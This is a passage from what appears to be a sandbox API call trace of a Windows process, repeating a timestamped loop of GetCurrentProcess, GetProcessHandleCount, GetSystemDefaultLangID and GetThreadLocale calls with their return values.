GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.174] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.174] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.174] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.174] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.174] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.174] GetSystemDefaultLangID () returned 0x230409 [0068.174] GetThreadLocale () returned 0x409 [0068.174] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.175] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.175] GetSystemDefaultLangID () returned 0x230409 [0068.175] GetThreadLocale () returned 0x409 [0068.175] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.176] GetThreadLocale () returned 0x409 [0068.176] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.176] GetThreadLocale () returned 0x409 [0068.176] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.176] GetThreadLocale () returned 0x409 [0068.176] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.176] GetThreadLocale () returned 0x409 [0068.176] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.176] GetThreadLocale () returned 0x409 [0068.176] GetCurrentProcess () returned 0xffffffff [0068.176] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.176] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.177] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.177] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.177] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.177] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.177] GetSystemDefaultLangID () returned 0x230409 [0068.177] GetThreadLocale () returned 0x409 [0068.177] GetCurrentProcess () returned 0xffffffff [0068.177] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.178] GetSystemDefaultLangID () returned 0x230409 [0068.178] GetThreadLocale () returned 0x409 [0068.178] GetCurrentProcess () returned 0xffffffff [0068.178] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.179] GetCurrentProcess () returned 0xffffffff [0068.179] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.179] GetSystemDefaultLangID () returned 0x230409 [0068.179] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.180] GetSystemDefaultLangID () returned 0x230409 [0068.180] GetThreadLocale () returned 0x409 [0068.180] GetCurrentProcess () returned 0xffffffff [0068.180] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.181] GetSystemDefaultLangID () returned 0x230409 [0068.181] GetThreadLocale () returned 0x409 [0068.181] GetCurrentProcess () returned 0xffffffff [0068.181] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.182] GetCurrentProcess () returned 0xffffffff [0068.182] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.182] GetSystemDefaultLangID () returned 0x230409 [0068.182] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.183] GetSystemDefaultLangID () returned 0x230409 [0068.183] GetThreadLocale () returned 0x409 [0068.183] GetCurrentProcess () returned 0xffffffff [0068.183] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.184] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.184] GetSystemDefaultLangID () returned 0x230409 [0068.184] GetThreadLocale () returned 0x409 [0068.184] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.185] GetCurrentProcess () returned 0xffffffff [0068.185] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.185] GetSystemDefaultLangID () returned 0x230409 [0068.185] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.186] GetThreadLocale () returned 0x409 [0068.186] GetCurrentProcess () returned 0xffffffff [0068.186] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.186] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.187] GetSystemDefaultLangID () returned 0x230409 [0068.187] GetThreadLocale () returned 0x409 [0068.187] GetCurrentProcess () returned 0xffffffff [0068.187] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: 